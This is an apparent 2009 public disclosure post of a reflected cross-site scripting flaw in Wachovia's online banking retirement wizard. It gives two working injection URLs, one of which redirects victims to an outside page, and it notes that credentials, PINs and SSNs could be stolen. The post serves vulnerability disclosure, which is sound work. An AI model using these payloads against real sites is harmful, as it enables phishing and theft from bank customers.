I found this a week ago and notified the CISO, and it still has not been
fixed.  It's a pretty simple cross site scripting vulnerabilty in the bank's
retirement wizard page, it could allow theft of usernames, passwords, pins,
SSN's, account numbers, etc.


----  Code

Wachovia Online Banking Retirement Wizard - XSS - PoC
This is only a proof of concept, please use this responsibly, don't phish,
you'll get caught anyway.
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 29
2009.

Very simple standard cross site scripting exploit.  As you can see, it works
with HEX as well.  Bad characters obviously arn't filtered correctly.

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=
><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script
%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html
";%3B</script>

--oxagast

----  Code